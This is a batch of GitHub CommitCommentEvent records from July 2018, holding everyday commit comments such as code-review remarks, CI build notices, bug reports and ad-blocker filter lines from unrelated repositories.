{"id":"7912401203","type":"CommitCommentEvent","actor":{"login":"Ittaji"},"repo":{"name":"mun3/F-ckAvgleAntiAdblock"},"payload":{"comment":{"id":29580360,"position":null,"line":null,"path":null,"commit_id":"e833e5ac347b7cfc4ac37e386856fe24e23411ce","created_at":"2018-07-03T12:59:19Z","updated_at":"2018-07-03T12:59:19Z","author_association":"NONE","body":"avgle.com###player_3x2_container\r\n@@||avgle.com/avideos.php\r\navgle.com#@#script:inject(abort-on-property-read.js, ExoDetector)"}},"created_at":"2018-07-03T12:59:19Z"}
{"id":"7912402614","type":"CommitCommentEvent","actor":{"login":"eRez-ws"},"repo":{"name":"whitesource/fs-agent"},"payload":{"comment":{"id":29580362,"position":null,"line":null,"path":null,"commit_id":"ed0f0db888e77ca4c280328d70b0f68db8fcb5af","created_at":"2018-07-03T12:59:34Z","updated_at":"2018-07-03T12:59:34Z","author_association":"CONTRIBUTOR","body":"this update breaks the build.\r\nplease revert"}},"created_at":"2018-07-03T12:59:34Z"}
{"id":"7912408041","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29580381,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-03T13:00:31Z","updated_at":"2018-07-03T13:00:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T13:00:31Z"}
{"id":"7912416212","type":"CommitCommentEvent","actor":{"login":"anigamova"},"repo":{"name":"cms-bph-trigger/cmssw"},"payload":{"comment":{"id":29580406,"position":1525,"line":1169,"path":"DQMOffline/Trigger/plugins/BPHMonitor.cc","commit_id":"3caf1135058b17d28ad6fc81a1d22afdf20f7b45","created_at":"2018-07-03T13:01:56Z","updated_at":"2018-07-03T13:01:56Z","author_association":"NONE","body":"Ok, it won't affect anything else in the code"}},"created_at":"2018-07-03T13:01:56Z"}
{"id":"7912417925","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580410,"position":31,"line":31,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:02:14Z","updated_at":"2018-07-03T13:02:14Z","author_association":"NONE","body":"Тут ты немного замудрила, можно было написать намного проще:\r\n\r\n```ts\r\nhandleToggleInvolvedFriend = index => {\r\n  const involved = this.state.involvedFriendIndexes.includes(index);\r\n\r\n  this.setState(\r\n    prevState =>\r\n      involved\r\n        ? {\r\n            involvedFriendIndexes: [...prevState.involvedFriendIndexes, index],\r\n          }\r\n        : {\r\n            involvedFriendIndexes: prevState.involvedFriendIndexes.filter(\r\n              involvedFriendIndex => involvedFriendIndex !== index,\r\n            ),\r\n            paidFriendIndex:\r\n              prevState.paidFriendIndex === index\r\n                ? null\r\n                : prevState.paidFriendIndex,\r\n          },\r\n  );\r\n};\r\n```"}},"created_at":"2018-07-03T13:02:14Z"}
{"id":"7912423465","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580429,"position":59,"line":59,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:03:13Z","updated_at":"2018-07-03T13:03:13Z","author_association":"NONE","body":"Тебе тут не нужно писать `.bind()`, потому что ты и так используешь стрелочную функцию."}},"created_at":"2018-07-03T13:03:13Z"}
{"id":"7912426384","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580438,"position":60,"line":60,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:03:43Z","updated_at":"2018-07-03T13:03:43Z","author_association":"NONE","body":"Меня смущает название пропа `presented` – не сразу понятно, что он значит."}},"created_at":"2018-07-03T13:03:43Z"}
{"id":"7912427872","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29580441,"position":null,"line":null,"path":null,"commit_id":"a704ed7b1b121c3bcff52d49bff8372360fe907c","created_at":"2018-07-03T13:03:59Z","updated_at":"2018-07-03T13:03:59Z","author_association":"CONTRIBUTOR","body":"Still happening from this core change, after taking in account fixes https://github.com/mamedev/mame/commit/b511b8ff3999570959396a3547fd814d77665c85 and https://github.com/mamedev/mame/commit/b184ebfd9d0ffbabb27f4797c5fb3da0a6770008:\r\n\r\n- All sets in neogeocd.cpp - No sound when boot animation is happening  (eg. neocd)\r\n- All sets using PowerPC 603 (all flavors) or MPC8240 - exception (drop to prompt) without any stack. (eg. gcus)\r\n- falcon40 - atarist.cpp\r\nException at EIP=0000000002df04ad (non-virtual thunk to m68000_base_device::execute_set_input(int, int)+0x00ad): STACK OVERFLOW\r\nThis only happens in my testing in 64-bit builds.  32-bit builds seem fine and does not crash.\r\n"}},"created_at":"2018-07-03T13:03:59Z"}
{"id":"7912428335","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29580445,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-03T13:04:04Z","updated_at":"2018-07-03T13:04:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T13:04:04Z"}
{"id":"7912435104","type":"CommitCommentEvent","actor":{"login":"Yuchanjuan"},"repo":{"name":"Yuchanjuan/hello-word"},"payload":{"comment":{"id":29580467,"position":null,"line":null,"path":null,"commit_id":"7f70c87decae0bd49f6a25cc44699b86c5744133","created_at":"2018-07-03T13:05:19Z","updated_at":"2018-07-03T13:05:19Z","author_association":"OWNER","body":"readme"}},"created_at":"2018-07-03T13:05:19Z"}
{"id":"7912435245","type":"CommitCommentEvent","actor":{"login":"ivuorinen"},"repo":{"name":"JeffreyWay/laravel-mix"},"payload":{"comment":{"id":29580468,"position":95,"line":112,"path":"src/StandaloneSass.js","commit_id":"049485f8d0f251355bd859b63cd9418b89f45755","created_at":"2018-07-03T13:05:21Z","updated_at":"2018-07-03T13:05:21Z","author_association":"NONE","body":"This looks like an error. Same happens to all `\"\\n\"` lines."}},"created_at":"2018-07-03T13:05:21Z"}
{"id":"7912436729","type":"CommitCommentEvent","actor":{"login":"WangYanyan-Git"},"repo":{"name":"WangYanyan-Git/my"},"payload":{"comment":{"id":29580470,"position":null,"line":null,"path":null,"commit_id":"0f6633fc17469f80507074734a013470e924b04e","created_at":"2018-07-03T13:05:37Z","updated_at":"2018-07-03T13:05:37Z","author_association":"OWNER","body":"这是第二次提交了"}},"created_at":"2018-07-03T13:05:37Z"}
{"id":"7912441720","type":"CommitCommentEvent","actor":{"login":"ImplicitDeny"},"repo":{"name":"lamuerta/LM-Warfare"},"payload":{"comment":{"id":29580478,"position":null,"line":null,"path":null,"commit_id":"8730e984c5f0ff9b25d8a243755f07e396bc94b2","created_at":"2018-07-03T13:06:29Z","updated_at":"2018-07-03T13:06:29Z","author_association":"COLLABORATOR","body":"Fixes #6 "}},"created_at":"2018-07-03T13:06:29Z"}
{"id":"7912443631","type":"CommitCommentEvent","actor":{"login":"nathanchance"},"repo":{"name":"android-linux-stable/msm-3.18"},"payload":{"comment":{"id":29580483,"position":null,"line":null,"path":null,"commit_id":"8f021777cd74076d941625b5341d3e3cc2679548","created_at":"2018-07-03T13:06:50Z","updated_at":"2018-07-03T13:06:50Z","author_association":"MEMBER","body":"I think you mean that 7dc58b124697ea9ed723da03a47d42019f9ee7cb is missing from 3.18.114. This commit was clearly omitted by CAF during the 3.18.31 merge (`git describe --contains 8f021777cd74076d941625b5341d3e3cc2679548`). There may have been a problem with it or CAF was lazy, I don't know but I'd rather err on the side of caution and just drop 7dc58b124697ea9ed723da03a47d42019f9ee7cb. If you want to pick both and let me know if there is an issue, I'll think about re-applying them."}},"created_at":"2018-07-03T13:06:50Z"}
{"id":"7912443822","type":"CommitCommentEvent","actor":{"login":"r4dixx"},"repo":{"name":"r4dixx/VisitCalgary"},"payload":{"comment":{"id":29580484,"position":null,"line":null,"path":null,"commit_id":"fb660b1945f5f6bc2006f2c3b99974873f57a35d","created_at":"2018-07-03T13:06:52Z","updated_at":"2018-07-03T13:06:52Z","author_association":"OWNER","body":"Brought by 42d92737138c763e66c5f7ffd11a6e3fec8f7615"}},"created_at":"2018-07-03T13:06:52Z"}
{"id":"7912446962","type":"CommitCommentEvent","actor":{"login":"tomlinsj"},"repo":{"name":"pmoetakef/django-dynamic-attachments"},"payload":{"comment":{"id":29580491,"position":18,"line":44,"path":"attachments/forms.py","commit_id":"c3476ef17df6e6ce62801bba19f4a8f54fe55107","created_at":"2018-07-03T13:07:28Z","updated_at":"2018-07-03T13:07:28Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-03T13:07:28Z"}
{"id":"7912448210","type":"CommitCommentEvent","actor":{"login":"FleischKarussel"},"repo":{"name":"jtyr/ansible-motd"},"payload":{"comment":{"id":29580493,"position":17,"line":44,"path":"README.md","commit_id":"b06bf8503cef003f5f17b1dd70bbfedc2a257289","created_at":"2018-07-03T13:07:40Z","updated_at":"2018-07-03T13:07:40Z","author_association":"NONE","body":"Hey Jiri,\r\nI'm currently trying to figure out, what \"I-2\" is and how it is being handled if I try to change the ASCII art.\r\nCan you please drop me a link to some documentation?\r\n\r\nThe only thing I get is with another ASCII art:\r\n\r\nPLAY [all] ***********************************************************************************\r\nERROR! Syntax Error while loading YAML.\r\n  expected <block end>, but found '<scalar>'\r\n\r\nThe error appears to have been in 'external_ansible-motd.yml': line 5, column 2, but may be elsewhere in the file depending on the exact syntax problem.\r\n\r\nThe offending line appears to be:\r\n\r\nmotd_ascii_art: |-2\r\n _____ _           _____\r\n ^ here\r\n\r\n$ ansible --version\r\nansible 2.5.5\r\n\r\nThank you!\r\nBr\r\nBenjamin"}},"created_at":"2018-07-03T13:07:40Z"}
{"id":"7912453366","type":"CommitCommentEvent","actor":{"login":"MrAlex94"},"repo":{"name":"MrAlex94/Waterfox"},"payload":{"comment":{"id":29580503,"position":null,"line":null,"path":null,"commit_id":"9c76c566b54387b0699ce73050ce1f07740a99ec","created_at":"2018-07-03T13:08:37Z","updated_at":"2018-07-03T13:08:37Z","author_association":"OWNER","body":"You're correct. I caught that yesterday, I'm testing reverting the individual patches and apply [this](https://github.com/mozilla/gecko-dev/commit/62e4158181c3dcb9d40f78d56821800cfe0fe752) patch instead."}},"created_at":"2018-07-03T13:08:37Z"}
{"id":"7912455927","type":"CommitCommentEvent","actor":{"login":"Glor2m0"},"repo":{"name":"Glor2m0/java-lern"},"payload":{"comment":{"id":29580510,"position":null,"line":null,"path":null,"commit_id":"8bea227ee5aca283aaf2e229dd248dd9000caf81","created_at":"2018-07-03T13:09:04Z","updated_at":"2018-07-03T13:09:04Z","author_association":"OWNER","body":"com"}},"created_at":"2018-07-03T13:09:04Z"}
{"id":"7912457698","type":"CommitCommentEvent","actor":{"login":"ehmadzubair"},"repo":{"name":"dev-arsalan/YahooAPI"},"payload":{"comment":{"id":29580517,"position":10,"line":10,"path":"yahoo/models.py","commit_id":"c038d7f8e431e036de07d203e0cb4b7d6651f0bc","created_at":"2018-07-03T13:09:23Z","updated_at":"2018-07-03T13:09:23Z","author_association":"NONE","body":"rename this to `num_reactions`"}},"created_at":"2018-07-03T13:09:23Z"}
{"id":"7912459382","type":"CommitCommentEvent","actor":{"login":"WebAssembler"},"repo":{"name":"logsmith/logsmith"},"payload":{"comment":{"id":29580524,"position":null,"line":null,"path":null,"commit_id":"3979a71cf0a3e76a663d834e130f9cdcd177c7a6","created_at":"2018-07-03T13:09:41Z","updated_at":"2018-07-03T13:09:41Z","author_association":"COLLABORATOR","body":"Removed last traces of retina resizing. Fixed fatal error on WC file if acf wasn't enabled."}},"created_at":"2018-07-03T13:09:41Z"}
{"id":"7912459523","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29580527,"position":null,"line":null,"path":null,"commit_id":"f5e6bf1c9a8f6d26adab2ba5bd9adcbd4920adad","created_at":"2018-07-03T13:09:43Z","updated_at":"2018-07-03T13:09:43Z","author_association":"OWNER","body":"### **Awareness**\r\nIs this for me?\r\n\r\nHow this works: We become aware of possibilities through conversations in networks.  We start considering whether these possibilities are right for us.\r\n\r\n### **Discovery**\r\nHow is this for me?\r\n\r\nHow this works:  We do something to test whether something is for us.  A short entry nano-project can help us take that first step to figure out whether something is for us!  Sharing nano-projects sets playing it forward in motion.\r\n\r\n### **Direction**\r\n\r\nHow this works: We do nano-projects and share it in our networks for feedback (playing it forward).  Feedback helps find our direction (decide on nano-projects that are doable and worth doing)\r\n\r\n### **Integration**\r\n\r\nHow this works:  We seek ways to use resources from past nano, micro, and macro projects to do new projects.  This project provides addition information to decide which of the possible nano-projects should be done next.  We continue playing it forward to seek feedback.\r\n\r\n### **Transformation**\r\n\r\nHow this works: We start picturing the impacts of selected nano-projects.  How will these nano-projects contribute to our micro and macro-projects?\r\n"}},"created_at":"2018-07-03T13:09:43Z"}
{"id":"7912460130","type":"CommitCommentEvent","actor":{"login":"rahmadir"},"repo":{"name":"rahmadir/h8-p0-w2"},"payload":{"comment":{"id":29580529,"position":null,"line":null,"path":null,"commit_id":"4430faabe165029359710a92599bdf87c1cd389d","created_at":"2018-07-03T13:09:50Z","updated_at":"2018-07-03T13:09:50Z","author_association":"OWNER","body":"Salah Upload"}},"created_at":"2018-07-03T13:09:50Z"}
{"id":"7912460741","type":"CommitCommentEvent","actor":{"login":"hixi"},"repo":{"name":"geometalab/chOpen-ML-Workshop-2017"},"payload":{"comment":{"id":29580531,"position":null,"line":null,"path":null,"commit_id":"205e2397e1363f4746243f1965a7dfbb427ff095","created_at":"2018-07-03T13:09:56Z","updated_at":"2018-07-03T13:09:56Z","author_association":"NONE","body":"Merge with upstream"}},"created_at":"2018-07-03T13:09:56Z"}
{"id":"7912461282","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580535,"position":95,"line":95,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:10:02Z","updated_at":"2018-07-03T13:10:02Z","author_association":"NONE","body":"Не очень понимаю, зачем нужно было разделение на два метода – дублирование же."}},"created_at":"2018-07-03T13:10:02Z"}
{"id":"7912461880","type":"CommitCommentEvent","actor":{"login":"nungerlol"},"repo":{"name":"lh-server/core"},"payload":{"comment":{"id":29580538,"position":null,"line":null,"path":null,"commit_id":"70970f9f5193e470c66739224050917ef58cf627","created_at":"2018-07-03T13:10:09Z","updated_at":"2018-07-03T13:10:09Z","author_association":"NONE","body":"Skipped through the second video linked above frame by frame and pulled out all the values for hits on the person recording or his current target and what class they were. Assumed some armor values and got the following information. Slightly lower than the classic values posted by Tobschinski but either way a lot lower than the current damage.\r\n\r\n![image](https://user-images.githubusercontent.com/40797156/42221533-3b656288-7eca-11e8-9dad-fcf664b28c59.png)\r\n"}},"created_at":"2018-07-03T13:10:09Z"}
{"id":"7912465375","type":"CommitCommentEvent","actor":{"login":"cdfgithub"},"repo":{"name":"cdfgithub/interview"},"payload":{"comment":{"id":29580550,"position":null,"line":null,"path":null,"commit_id":"91acbe1f317d46f22e4deaf3a6a92eafba6d7c54","created_at":"2018-07-03T13:10:44Z","updated_at":"2018-07-03T13:10:44Z","author_association":"OWNER","body":"面试过程中，积累的面试题目"}},"created_at":"2018-07-03T13:10:44Z"}
{"id":"7912473333","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580570,"position":98,"line":98,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:12:12Z","updated_at":"2018-07-03T13:12:12Z","author_association":"NONE","body":"Зачем добавлять суффикс `Array` к переменной? Ты же не пишешь `moneyPerOnePersonNumber` – оно и так понятно.\r\n\r\nК тому же, когда называешь переменную, ты должна чётко говорить, для чего переменная предназначена. Так как тут ты создаёшь массив изменённых друзей, было бы логично назвать переменную `newFriends` или `updatedFriends`, например."}},"created_at":"2018-07-03T13:12:12Z"}
{"id":"7912474232","type":"CommitCommentEvent","actor":{"login":"tooky"},"repo":{"name":"cucumber/cucumber-java-skeleton"},"payload":{"comment":{"id":29580571,"position":null,"line":null,"path":null,"commit_id":"e163b28ae2f91128c4d739e5a297f2779897072c","created_at":"2018-07-03T13:12:21Z","updated_at":"2018-07-03T13:12:21Z","author_association":"MEMBER","body":"@aslakhellesoy I wonder if we should have this in the default skeleton? Could this result in everyone sending results to cucumber pro, whether they have a project set up or not?"}},"created_at":"2018-07-03T13:12:21Z"}
{"id":"7912481598","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580584,"position":99,"line":99,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:13:36Z","updated_at":"2018-07-03T13:13:36Z","author_association":"NONE","body":"Мутирование этой и всех прочих переменных в этом методе можно было предовратить. Старайся в дальнейшем вообще не использовать мутируемые переменные – это одна из самых больших причин багов в JS."}},"created_at":"2018-07-03T13:13:36Z"}
{"id":"7912482588","type":"CommitCommentEvent","actor":{"login":"Hartorn"},"repo":{"name":"thc-tools/webpack-react"},"payload":{"comment":{"id":29580586,"position":null,"line":null,"path":null,"commit_id":"016850836a0e3f1d1e30f8cfc09cd9ebe6ec11ab","created_at":"2018-07-03T13:13:47Z","updated_at":"2018-07-03T13:13:47Z","author_association":"CONTRIBUTOR","body":"@rarkins Indeed it is not, thanks!\nI'm not used to alpha version, and semver.\nBy curiosity, is this an automatic message? "}},"created_at":"2018-07-03T13:13:47Z"}
{"id":"7912485567","type":"CommitCommentEvent","actor":{"login":"brownian"},"repo":{"name":"hpimr/hpimr"},"payload":{"comment":{"id":29580593,"position":5,"line":35,"path":"007.asc","commit_id":"a0e565b42b41a092faed2bd22553fe6cda9ffb53","created_at":"2018-07-03T13:14:17Z","updated_at":"2018-07-03T13:14:17Z","author_association":"CONTRIBUTOR","body":"@hedrok тут крапки взагалі не було, ніби; я додав (тобто, спершу додав поза дужкою, потім переніс у дужки). Проте **поламалося генерування посилання**: asciidoctor крапку вважає частиною посилання.\r\n\r\nЯкщо після крапки додати пробіл, то працює. Документація з цього приводу просто каже, що крапка не заважає: https://asciidoctor.org/docs/user-manual/#url\r\n\r\nПроте з дужкою одразу після крапки заважає.\r\n\r\nВласне, можу зробити так:\r\n\r\n(Примітка перекладача: гадаю, йдеться про https://wiki.lesswrong.com/wiki/Sequences[https://wiki.lesswrong.com/wiki/Sequences].)"}},"created_at":"2018-07-03T13:14:17Z"}
{"id":"7912489463","type":"CommitCommentEvent","actor":{"login":"MattX83"},"repo":{"name":"MattX83/background-generator"},"payload":{"comment":{"id":29580600,"position":null,"line":null,"path":null,"commit_id":"4a813da8600a6731e9f2f083c4618779ecf8c24b","created_at":"2018-07-03T13:15:00Z","updated_at":"2018-07-03T13:15:00Z","author_association":"OWNER","body":"I updated the file names without a \"1\" at the end like copied files."}},"created_at":"2018-07-03T13:15:00Z"}
{"id":"7912490419","type":"CommitCommentEvent","actor":{"login":"Bernolt"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29580602,"position":4,"line":123,"path":"ci/travis_script_python.sh","commit_id":"c9ce215b9d22021268a1c2c3a70df99cb4f311c1","created_at":"2018-07-03T13:15:11Z","updated_at":"2018-07-03T13:15:11Z","author_association":"NONE","body":"I have to check, but I think this is the default value already, so we don't have to set it again."}},"created_at":"2018-07-03T13:15:11Z"}
{"id":"7912493073","type":"CommitCommentEvent","actor":{"login":"heersaak"},"repo":{"name":"rsm-gh/akbl"},"payload":{"comment":{"id":29580612,"position":null,"line":null,"path":null,"commit_id":"440f323ea10f069713847436341dcdd1280941e9","created_at":"2018-07-03T13:15:38Z","updated_at":"2018-07-03T13:15:38Z","author_association":"NONE","body":"In the file usr/lib/python3/AKBL/ADDONS/GUI/GUI.py\r\nyou forgot to change the line 46:\r\n\r\n`os.chdir(\"/usr/share/AlienwareKBL\") # this is important for the rest of the code.`\r\n\r\nto:\r\n`os.chdir(\"/usr/share/AKBL\") # this is important for the rest of the code.`\r\n\r\nOtherwise the program won't start :)"}},"created_at":"2018-07-03T13:15:38Z"}
{"id":"7912493683","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":29580616,"position":null,"line":null,"path":null,"commit_id":"39191fc040524e2c56b575bb799e6119cc52c3be","created_at":"2018-07-03T13:15:44Z","updated_at":"2018-07-03T13:15:44Z","author_association":"CONTRIBUTOR","body":"Maybe a silly question but: should there be a Plate here at all? Somehow I thought that Summarize ran in operator-form, not over measure-form.  Or do I misremember?"}},"created_at":"2018-07-03T13:15:44Z"}
{"id":"7912494130","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29580617,"position":7,"line":7,"path":"mysql-test/suite/innodb/t/virtual_purge.test","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:15:49Z","updated_at":"2018-07-03T13:15:49Z","author_association":"CONTRIBUTOR","body":"This requires `not_embedded.inc`, because it is restarting the server.\r\nPreferrably we should avoid restarting the server. Why would `wait_innodb_all_purged.inc` not clean up the undo records from previous tests?\r\nAlso, given that this test is for 10.2, please be aware that a slow shutdown may fail to purge all undo records. MDEV-13603 was fixed in 10.3.6  only, in commit ba67b50ac48d4911ebee4468007abce06b5d3093.\r\n\r\nSo, it would be better to wait for the purge without restarting the server."}},"created_at":"2018-07-03T13:15:49Z"}
{"id":"7912494201","type":"CommitCommentEvent","actor":{"login":"jpayne23"},"repo":{"name":"jpayne23/simple-20180703095816141"},"payload":{"comment":{"id":29580618,"position":null,"line":null,"path":null,"commit_id":"8640329411afa88aae80ea2e684891a6af840be5","created_at":"2018-07-03T13:15:50Z","updated_at":"2018-07-03T13:15:50Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/a0ae9129-3ffc-4bf7-ac2b-05cb89d1c153?env_id=ibm%3Ayp%3Aeu-gb \"simple-20180703095816141\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/3c4f475e-d3f4-42fe-b3f9-fec43b342edd?env_id=ibm%3Ayp%3Aeu-gb \"simple-20180703095816141\") deployed [simple-20180703095816141](https://github.com/jpayne23/simple-20180703095816141/releases/tag/deploy-ibm-yp-eu-gb-joseph.payne-staging-20180703-131549 \"deploy-ibm-yp-eu-gb-joseph.payne-staging-20180703-131549\") to [staging](https://console.bluemix.net/apps/31a6fe56-bf65-4f37-9cd5-a97e8a14c1c1?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:joseph.payne:staging\"), including this commit"}},"created_at":"2018-07-03T13:15:50Z"}
{"id":"7912495353","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580624,"position":107,"line":107,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:16:02Z","updated_at":"2018-07-03T13:16:02Z","author_association":"NONE","body":"Так же, как не стоит использовать мутируемые переменные, не стоит использовать мутирующие методы (как `Array#push`). Мутирование – вообще одно из самых больших зол в программировании – почти любую программу можно переписать без мутирования.\r\n\r\nP.S. это не лично моё мнение – есть очень много аргументов. Бинур должен вам позже рассказать."}},"created_at":"2018-07-03T13:16:02Z"}
{"id":"7912499105","type":"CommitCommentEvent","actor":{"login":"helmuthb"},"repo":{"name":"DACHFest/dachfest.de"},"payload":{"comment":{"id":29580629,"position":null,"line":null,"path":null,"commit_id":"80d77726baf8336a5058df79fa33480886c1b708","created_at":"2018-07-03T13:16:41Z","updated_at":"2018-07-03T13:16:41Z","author_association":"CONTRIBUTOR","body":"This commit is causing some issues - now there is a white bar on the top of the screen.\r\n![image](https://user-images.githubusercontent.com/1159449/42221895-f680fdbc-7ed3-11e8-9a4b-7e3f29e7ce04.png)\r\n\r\nCan we revert to the original toolbar size? Or somehow else fix this issue?"}},"created_at":"2018-07-03T13:16:41Z"}
{"id":"7912501961","type":"CommitCommentEvent","actor":{"login":"PramuPerera"},"repo":{"name":"PramuPerera/OneClassGAN"},"payload":{"comment":{"id":29580630,"position":null,"line":null,"path":null,"commit_id":"c2757789309738016a3b0f175a3c94296ce8b16f","created_at":"2018-07-03T13:17:12Z","updated_at":"2018-07-03T13:17:12Z","author_association":"OWNER","body":"Add trainerD2.step(batch.data[0].shape[0])"}},"created_at":"2018-07-03T13:17:12Z"}
{"id":"7912504133","type":"CommitCommentEvent","actor":{"login":"rarkins"},"repo":{"name":"thc-tools/webpack-react"},"payload":{"comment":{"id":29580636,"position":null,"line":null,"path":null,"commit_id":"016850836a0e3f1d1e30f8cfc09cd9ebe6ec11ab","created_at":"2018-07-03T13:17:33Z","updated_at":"2018-07-03T13:17:33Z","author_association":"NONE","body":"No, not automated. I noticed in the Renovate logs that it was attempting to “roll back” because it can’t find any version matching 0.x"}},"created_at":"2018-07-03T13:17:33Z"}
{"id":"7912511423","type":"CommitCommentEvent","actor":{"login":"rarkins"},"repo":{"name":"thc-tools/webpack-react"},"payload":{"comment":{"id":29580649,"position":null,"line":null,"path":null,"commit_id":"016850836a0e3f1d1e30f8cfc09cd9ebe6ec11ab","created_at":"2018-07-03T13:18:50Z","updated_at":"2018-07-03T13:18:50Z","author_association":"NONE","body":"I think if you set the version to ^ plus current version then it will be like the 0.x you intended. However.. if you are using 0.x then you may as well just use 0.0.1, 0.0.2, etc"}},"created_at":"2018-07-03T13:18:50Z"}
{"id":"7912511582","type":"CommitCommentEvent","actor":{"login":"bvinayakumar"},"repo":{"name":"project-sunbird/sunbird-functional-tests"},"payload":{"comment":{"id":29580650,"position":1,"line":1,"path":"sunbird_service_api_test/src/test/resources/templates/organisation/create/create_rootorg_with_new_channel_request.json","commit_id":"3d4f194eb53e34841f7844ab168539ac1e1046f5","created_at":"2018-07-03T13:18:52Z","updated_at":"2018-07-03T13:18:52Z","author_association":"CONTRIBUTOR","body":"Create a folder for each test (e.g. createRootOrgWithNewChannel). Within that create request.json and response.json."}},"created_at":"2018-07-03T13:18:52Z"}
{"id":"7912511621","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29580651,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-03T13:18:53Z","updated_at":"2018-07-03T13:18:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T13:18:53Z"}
